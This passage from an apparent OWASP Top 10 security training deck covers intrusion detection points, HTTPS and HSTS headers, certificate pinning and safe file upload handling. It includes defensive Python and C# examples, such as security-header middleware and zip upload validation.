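        past_threshold = self._counts[(user, point)] - THRESHOLDS[point]
        if past_threshold < 0:
            return "log"
        return RESPONSES[min(1 + past_threshold, len(RESPONSES) - 1)]


def inspect_request(sensor, user, path, form, last_step=None):
    """Run the detection points against one request; returns {point: response}.
    Ordinary input validation still rejects the request; this only decides
    whether the pattern of failures looks like an attack in progress."""
    hits = {}
    if path in HONEYPOT_PATHS:
        hits["forced_browsing"] = sensor.record(user, "forced_browsing")
    for field, allowed in NON_EDITABLE_FIELDS.items():
        if field in form and form[field] not in allowed:
            # A browser cannot submit a value outside the select list; a proxy can.
            hits["non_editable_param"] = sensor.record(user, "non_editable_param")
    step = form.get("step")
    if step in CHECKOUT_FLOW:
        if last_step in CHECKOUT_FLOW:
            expected = CHECKOUT_FLOW[min(CHECKOUT_FLOW.index(last_step) + 1, len(CHECKOUT_FLOW) - 1)]
        else:
            expected = CHECKOUT_FLOW[0]
        if step != expected:
            hits["workflow_abuse"] = sensor.record(user, "workflow_abuse")
    if "sku" in form and "price" in form:
        # The client never gets to assert the price; it is looked up server side.
        if str(CATALOGUE_PRICES.get(form["sku"])) != str(form["price"]):
            hits["price_mismatch"] = sensor.record(user, "price_mismatch")
    return hits
```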

Page 82: Application Security around OWASP Top 10

OWASP AppSensor (Java)

• Project and mailing list https://www.owasp.org/index.php/OWASP_AppSensor_Project

• Four-page briefing, Crosstalk, Journal of Defense Software Engineering

• http://www.crosstalkonline.org/storage/issue-archives/2011/201109/201109-Watson.pdf

Page 83: Application Security around OWASP Top 10

[E3] Encryption in transit

• Confidentiality, Integrity (in Transit) and Authenticity

– Authentication credentials and session identifiers must be encrypted in transit via HTTPS/SSL

– Starting when the login form is rendered until logout is complete

• HTTPS configuration best practices – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet

• HSTS (Strict Transport Security) – http://www.youtube.com/watch?v=zEV3HOuM_Vw – Strict-Transport-Security: max-age=31536000

• Certificate Pinning – https://www.owasp.org/index.php/Pinning_Cheat_Sheet

Page 84: Application Security around OWASP Top 10

Strict-Transport-Security: max-age=10000000

Do all of your subdomains support SSL?

Strict-Transport-Security: max-age=10000000; includeSubDomains

Strict Transport Security (HSTS)

// in global.asax
protected void Application_BeginRequest(Object sender, EventArgs e)
{
    switch (Request.Url.Scheme)
    {
        case "https":
            Response.AddHeader("Strict-Transport-Security", "max-age=31536000");
            break;
        case "http":
            var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery;
            Response.Status = "301 Moved Permanently";
            Response.AddHeader("Location", path);
            break;
    }
}
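The global.asax logic above, together with the response headers from the earlier header slides, as an added Python WSGI middleware (mine, not the deck's C#): plain-http requests get a 301 to the https URL, https responses get HSTS (includeSubDomains only when asked for) plus the anti-clickjacking, nosniff, XSS-auditor and CSP headers, and paths under a configurable prefix get the no-cache headers. The header values, the prefix and the hello_app are this example's choices; the standard Content-Security-Policy name is used where the deck shows the older X-Content-Security-Policy.

```python
from urllib.parse import quote

HSTS_MAX_AGE = 31536000  # one year, as in the deck's global.asax

# Values chosen for this example; tighten CSP to what your pages actually load.
SECURITY_HEADERS = [
    ("X-Frame-Options", "DENY"),
    ("X-XSS-Protection", "1; mode=block"),
    ("X-Content-Type-Options", "nosniff"),
    ("Content-Security-Policy", "default-src 'self'"),
]
NO_CACHE_HEADERS = [
    ("Cache-Control", "no-store, no-cache, must-revalidate"),
    ("Pragma", "no-cache"),
    ("Expires", "-1"),
]


class SecurityHeadersMiddleware:
    def __init__(self, app, include_subdomains=False, no_cache_prefixes=("/account",)):
        self.app = app
        # Only set includeSubDomains when every subdomain really serves HTTPS.
        self.include_subdomains = include_subdomains
        self.no_cache_prefixes = tuple(no_cache_prefixes)

    def hsts_value(self):
        value = "max-age=%d" % HSTS_MAX_AGE
        if self.include_subdomains:
            value += "; includeSubDomains"
        return value

    def __call__(self, environ, start_response):
        if environ.get("wsgi.url_scheme") != "https":
            # http: permanent redirect to the same path over https. No HSTS here;
            # browsers ignore the header on plain http anyway.
            location = "https://%s%s" % (environ.get("HTTP_HOST", ""), quote(environ.get("PATH_INFO", "/")))
            if environ.get("QUERY_STRING"):
                location += "?" + environ["QUERY_STRING"]
            start_response("301 Moved Permanently", [("Location", location), ("Content-Length", "0")])
            return [b""]

        def secured_start_response(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            extra = [("Strict-Transport-Security", self.hsts_value())] + SECURITY_HEADERS
            if environ.get("PATH_INFO", "").startswith(self.no_cache_prefixes):
                extra = extra + NO_CACHE_HEADERS
            # The application's own headers win; only missing ones are added.
            merged = headers + [(n, v) for n, v in extra if n.lower() not in present]
            return start_response(status, merged, exc_info)

        return self.app(environ, secured_start_response)


def run(app, environ):
    """Tiny harness: call a WSGI app and return (status, headers dict, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, headers

    body = b"".join(app(environ, start_response))
    return captured["status"], dict(captured["headers"]), body


def hello_app(environ, start_response):
    """Constructed application used to exercise the middleware."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello"]
```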

Page 85: Application Security around OWASP Top 10

• What is Pinning

– Pinning is a key continuity scheme

– Detect when an imposter with a fake but CA-validated certificate attempts to act like the real server

• 2 Types of pinning

• Carry around a copy of the server's public key

– Great if you are distributing a dedicated client-server application since you know the server's certificate or public key in advance

• Note the server's public key on first use (Trust-on-First-Use, TOFU)

– Useful when no a priori knowledge exists, such as SSH or a browser

• https://www.owasp.org/index.php/Pinning_Cheat_Sheet

Certificate Pinning

Page 86: Application Security around OWASP Top 10

File Upload Security

• Upload Verification – Filename and Size validation + antivirus

• Upload Storage – Use only trusted filenames + separate domain

• Beware of "special" files – "crossdomain.xml" or "clientaccesspolicy.xml".

• Image Upload Verification

– Enforce proper image size limits

– Use image rewriting libraries

– Set the extension of the stored image to be a valid image extension

– Ensure the detected content type of the image is safe

• Generic Upload Verification

– Ensure decompressed size of file < maximum size

– Ensure that an uploaded archive matches the type expected (zip, rar)

– Ensure structured uploads such as an add-on follow proper standard

[E4]
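The image and archive checks from the slide above, as an added Python example (mine, not from the deck): the content type comes from the file's bytes rather than the client's filename, the stored name is generated server side with the detected extension, "special" filenames are refused, and a zip upload is checked for type, member count, unsafe member paths and decompressed size both from the declared sizes and while actually inflating. The limits and the make_sample_zip helper are constructed for the demo.

```python
import io
import os
import uuid
import zipfile

# Limits chosen for the demo.
MAX_UPLOAD_BYTES = 5 * 1024 * 1024         # raw upload size
MAX_DECOMPRESSED_BYTES = 20 * 1024 * 1024  # total after inflation
MAX_MEMBERS = 500
SPECIAL_FILES = {"crossdomain.xml", "clientaccesspolicy.xml"}
IMAGE_MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpg",
               b"GIF87a": "gif", b"GIF89a": "gif"}
ZIP_MAGIC = b"PK\x03\x04"


def detect_image_type(data):
    """Content type from the bytes, not from the client's filename or header."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def trusted_filename(ext):
    """Storage name the client never influences; extension from the detected type."""
    return "%s.%s" % (uuid.uuid4().hex, ext)


def verify_image_upload(data, client_filename):
    """Returns (accepted, detail): detail is the stored name or the reason."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    ext = detect_image_type(data)
    if ext is None:
        return False, "content is not a supported image (client said %r)" % client_filename
    if os.path.basename(client_filename).lower() in SPECIAL_FILES:
        return False, "special filename not allowed"
    return True, trusted_filename(ext)


def verify_zip_upload(data):
    """Returns (accepted, detail): detail is the real decompressed size when accepted."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    if not data.startswith(ZIP_MAGIC):
        return False, "not a zip archive"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            infos = zf.infolist()
            if len(infos) > MAX_MEMBERS:
                return False, "too many members"
            for info in infos:
                parts = info.filename.replace("\\", "/").split("/")
                if info.filename.startswith(("/", "\\")) or ".." in parts or ":" in info.filename:
                    return False, "unsafe member path %r" % info.filename
                if parts[-1].lower() in SPECIAL_FILES:
                    return False, "special file %r in archive" % info.filename
            # Declared sizes are a cheap first filter, but headers can lie...
            if sum(i.file_size for i in infos) > MAX_DECOMPRESSED_BYTES:
                return False, "declared decompressed size exceeds limit"
            # ...so count the bytes while actually inflating, and stop at the cap.
            total = 0
            for info in infos:
                with zf.open(info) as member:
                    while True:
                        chunk = member.read(64 * 1024)
                        if not chunk:
                            break
                        total += len(chunk)
                        if total > MAX_DECOMPRESSED_BYTES:
                            return False, "decompressed size exceeds limit"
            return True, total
    except zipfile.BadZipFile:
        return False, "corrupt zip archive"


def make_sample_zip(members):
    """Constructed test input: {member name: bytes} packed into an in-memory zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()
```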

Page 87: Application Security around OWASP Top 10

Thank you!